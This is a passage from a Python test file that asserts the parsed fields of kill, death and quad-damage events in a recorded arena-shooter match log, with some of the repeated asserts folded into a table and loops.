assert e[35]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[35]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[35]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[35]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[35]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[35]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[35]['DATA']['WARMUP'] == False # noqa
assert e[35]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[36]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[36]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[36]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[36]['DATA']['KILLER']['BOT'] is None # noqa
assert e[36]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[36]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[36]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[36]['DATA']['KILLER']['NAME'] is None # noqa
assert e[36]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[36]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[36]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[36]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[36]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[36]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[36]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[36]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[36]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[36]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[36]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[36]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[36]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[36]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[36]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[36]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[36]['DATA']['ROUND'] is None # noqa
assert e[36]['DATA']['SUICIDE'] is None # noqa
assert e[36]['DATA']['TEAMKILL'] is None # noqa
assert e[36]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[36]['DATA']['TEAM_DEAD'] is None # noqa
assert e[36]['DATA']['TIME'] == 122.2 # noqa
assert e[36]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[36]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[36]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[36]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[36]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[36]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[36]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[36]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[36]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[36]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[36]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[36]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[36]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[36]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[36]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[36]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[36]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[36]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[36]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[36]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[36]['DATA']['WARMUP'] == False # noqa
assert e[36]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[37]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[37]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[37]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[37]['DATA']['KILLER']['BOT'] is None # noqa
assert e[37]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[37]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[37]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[37]['DATA']['KILLER']['NAME'] is None # noqa
assert e[37]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[37]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[37]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[37]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[37]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[37]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[37]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[37]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[37]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[37]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[37]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[37]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[37]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[37]['DATA']['MOD'] == 'ROCKET' # noqa
assert e[37]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[37]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[37]['DATA']['ROUND'] is None # noqa
assert e[37]['DATA']['SUICIDE'] is None # noqa
assert e[37]['DATA']['TEAMKILL'] is None # noqa
assert e[37]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[37]['DATA']['TEAM_DEAD'] is None # noqa
assert e[37]['DATA']['TIME'] == 122.2 # noqa
assert e[37]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[37]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[37]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[37]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[37]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[37]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[37]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[37]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[37]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[37]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[37]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[37]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[37]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[37]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[37]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[37]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[37]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[37]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[37]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[37]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[37]['DATA']['WARMUP'] == False # noqa
assert e[37]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[38]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[38]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[38]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[38]['DATA']['KILLER']['BOT'] is None # noqa
assert e[38]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[38]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[38]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[38]['DATA']['KILLER']['NAME'] is None # noqa
assert e[38]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[38]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[38]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[38]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[38]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[38]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[38]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[38]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[38]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[38]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[38]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[38]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[38]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[38]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[38]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[38]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[38]['DATA']['ROUND'] is None # noqa
assert e[38]['DATA']['SUICIDE'] is None # noqa
assert e[38]['DATA']['TEAMKILL'] is None # noqa
assert e[38]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[38]['DATA']['TEAM_DEAD'] is None # noqa
assert e[38]['DATA']['TIME'] == 130.8 # noqa
assert e[38]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[38]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[38]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[38]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[38]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[38]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[38]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[38]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[38]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[38]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[38]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[38]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[38]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[38]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[38]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[38]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[38]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[38]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[38]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[38]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[38]['DATA']['WARMUP'] == False # noqa
assert e[38]['TYPE'] == 'PLAYER_KILL' # noqa
# Events 39-49: each frag is reported twice, as a PLAYER_KILL followed by a
# matching PLAYER_DEATH, with identical DATA payloads. In these records every
# optional killer/victim field and every round/team counter is None; only the
# STEAM_IDs, MOD, TIME, MATCH_GUID and WARMUP carry values. The ~570
# duplicated asserts are replaced by one expectation table plus loops that
# check the identical set of facts; the `== False` comparisons are tightened
# to `is False` (pycodestyle E712) since WARMUP is a boolean flag.
#
# Expectation rows: (event index, killer STEAM_ID, MOD, time,
#                    victim STEAM_ID, event TYPE).
_EXPECTED_FRAGS = [
    (39, '6179638dba55b8f5d2da7838', 'LIGHTNING', 130.8,
     '7727c59e2bf61c4a67428d15', 'PLAYER_DEATH'),
    (40, '6179638dba55b8f5d2da7838', 'ROCKET_SPLASH', 135.4,
     '7727c59e2bf61c4a67428d15', 'PLAYER_KILL'),
    (41, '6179638dba55b8f5d2da7838', 'ROCKET_SPLASH', 135.4,
     '7727c59e2bf61c4a67428d15', 'PLAYER_DEATH'),
    (42, '6179638dba55b8f5d2da7838', 'ROCKET', 138.4,
     '254e24151c9e5466251073e6', 'PLAYER_KILL'),
    (43, '6179638dba55b8f5d2da7838', 'ROCKET', 138.4,
     '254e24151c9e5466251073e6', 'PLAYER_DEATH'),
    (44, '6179638dba55b8f5d2da7838', 'LIGHTNING', 147.8,
     '254e24151c9e5466251073e6', 'PLAYER_KILL'),
    (45, '6179638dba55b8f5d2da7838', 'LIGHTNING', 147.8,
     '254e24151c9e5466251073e6', 'PLAYER_DEATH'),
    (46, '7727c59e2bf61c4a67428d15', 'SHOTGUN', 151.4,
     '6179638dba55b8f5d2da7838', 'PLAYER_KILL'),
    (47, '7727c59e2bf61c4a67428d15', 'SHOTGUN', 151.4,
     '6179638dba55b8f5d2da7838', 'PLAYER_DEATH'),
    (48, '6179638dba55b8f5d2da7838', 'GAUNTLET', 169.9,
     '7727c59e2bf61c4a67428d15', 'PLAYER_KILL'),
    (49, '6179638dba55b8f5d2da7838', 'GAUNTLET', 169.9,
     '7727c59e2bf61c4a67428d15', 'PLAYER_DEATH'),
]
# Player sub-dict keys that must be None in these detail-less records.
_PLAYER_NONE_KEYS = ('AIRBORNE', 'AMMO', 'ARMOR', 'BOT', 'BOT_SKILL',
                     'HEALTH', 'HOLDABLE', 'NAME', 'POWERUPS', 'SPEED',
                     'SUBMERGED', 'TEAM', 'WEAPON')
# Top-level DATA keys that must be None (free-for-all: no round/team state).
_DATA_NONE_KEYS = ('OTHER_TEAM_ALIVE', 'OTHER_TEAM_DEAD', 'ROUND',
                   'SUICIDE', 'TEAMKILL', 'TEAM_ALIVE', 'TEAM_DEAD')
for _idx, _killer_id, _mod, _time, _victim_id, _etype in _EXPECTED_FRAGS:
    _data = e[_idx]['DATA']
    for _role, _steam_id in (('KILLER', _killer_id), ('VICTIM', _victim_id)):
        _player = _data[_role]
        for _key in _PLAYER_NONE_KEYS:
            assert _player[_key] is None
        for _axis in ('X', 'Y', 'Z'):
            assert _player['POSITION'][_axis] is None
            assert _player['VIEW'][_axis] is None
        assert _player['STEAM_ID'] == _steam_id
    assert _data['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b'
    assert _data['MOD'] == _mod
    for _key in _DATA_NONE_KEYS:
        assert _data[_key] is None
    assert _data['TIME'] == _time
    assert _data['WARMUP'] is False
    assert e[_idx]['TYPE'] == _etype
assert e[50]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[50]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[50]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[50]['DATA']['KILLER']['BOT'] is None # noqa
assert e[50]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[50]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[50]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[50]['DATA']['KILLER']['NAME'] is None # noqa
assert e[50]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[50]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[50]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[50]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[50]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[50]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[50]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[50]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[50]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[50]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[50]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[50]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[50]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[50]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[50]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[50]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[50]['DATA']['ROUND'] is None # noqa
assert e[50]['DATA']['SUICIDE'] is None # noqa
assert e[50]['DATA']['TEAMKILL'] is None # noqa
assert e[50]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[50]['DATA']['TEAM_DEAD'] is None # noqa
assert e[50]['DATA']['TIME'] == 180.1 # noqa
assert e[50]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[50]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[50]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[50]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[50]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[50]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[50]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[50]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[50]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[50]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[50]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[50]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[50]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[50]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[50]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[50]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[50]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[50]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[50]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[50]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[50]['DATA']['WARMUP'] == False # noqa
assert e[50]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[51]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[51]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[51]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[51]['DATA']['KILLER']['BOT'] is None # noqa
assert e[51]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[51]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[51]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[51]['DATA']['KILLER']['NAME'] is None # noqa
assert e[51]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[51]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[51]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[51]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[51]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[51]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[51]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[51]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[51]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[51]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[51]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[51]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[51]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[51]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[51]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[51]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[51]['DATA']['ROUND'] is None # noqa
assert e[51]['DATA']['SUICIDE'] is None # noqa
assert e[51]['DATA']['TEAMKILL'] is None # noqa
assert e[51]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[51]['DATA']['TEAM_DEAD'] is None # noqa
assert e[51]['DATA']['TIME'] == 180.1 # noqa
assert e[51]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[51]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[51]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[51]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[51]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[51]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[51]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[51]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[51]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[51]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[51]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[51]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[51]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[51]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[51]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[51]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[51]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[51]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[51]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[51]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[51]['DATA']['WARMUP'] == False # noqa
assert e[51]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[52]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[52]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[52]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[52]['DATA']['KILLER']['BOT'] is None # noqa
assert e[52]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[52]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[52]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[52]['DATA']['KILLER']['NAME'] is None # noqa
assert e[52]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[52]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[52]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[52]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[52]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[52]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[52]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[52]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[52]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[52]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[52]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[52]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[52]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[52]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[52]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[52]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[52]['DATA']['ROUND'] is None # noqa
assert e[52]['DATA']['SUICIDE'] is None # noqa
assert e[52]['DATA']['TEAMKILL'] is None # noqa
assert e[52]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[52]['DATA']['TEAM_DEAD'] is None # noqa
assert e[52]['DATA']['TIME'] == 190.5 # noqa
assert e[52]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[52]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[52]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[52]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[52]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[52]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[52]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[52]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[52]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[52]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[52]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[52]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[52]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[52]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[52]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[52]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[52]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[52]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[52]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[52]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[52]['DATA']['WARMUP'] == False # noqa
assert e[52]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[53]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[53]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[53]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[53]['DATA']['KILLER']['BOT'] is None # noqa
assert e[53]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[53]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[53]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[53]['DATA']['KILLER']['NAME'] is None # noqa
assert e[53]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[53]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[53]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[53]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[53]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[53]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[53]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[53]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[53]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[53]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[53]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[53]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[53]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[53]['DATA']['MOD'] == 'GAUNTLET' # noqa
assert e[53]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[53]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[53]['DATA']['ROUND'] is None # noqa
assert e[53]['DATA']['SUICIDE'] is None # noqa
assert e[53]['DATA']['TEAMKILL'] is None # noqa
assert e[53]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[53]['DATA']['TEAM_DEAD'] is None # noqa
assert e[53]['DATA']['TIME'] == 190.5 # noqa
assert e[53]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[53]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[53]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[53]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[53]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[53]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[53]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[53]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[53]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[53]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[53]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[53]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[53]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[53]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[53]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[53]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[53]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[53]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[53]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[53]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[53]['DATA']['WARMUP'] == False # noqa
assert e[53]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[54]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[54]['DATA']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[54]['DATA']['TIME'] == 195.3 # noqa
assert e[54]['DATA']['WARMUP'] == False # noqa
assert e[54]['TYPE'] == 'PLAYER_QUAD' # noqa
assert e[55]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[55]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[55]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[55]['DATA']['KILLER']['BOT'] is None # noqa
assert e[55]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[55]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[55]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[55]['DATA']['KILLER']['NAME'] is None # noqa
assert e[55]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[55]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[55]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[55]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[55]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[55]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[55]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[55]['DATA']['KILLER']['TEAM'] is None # noqa
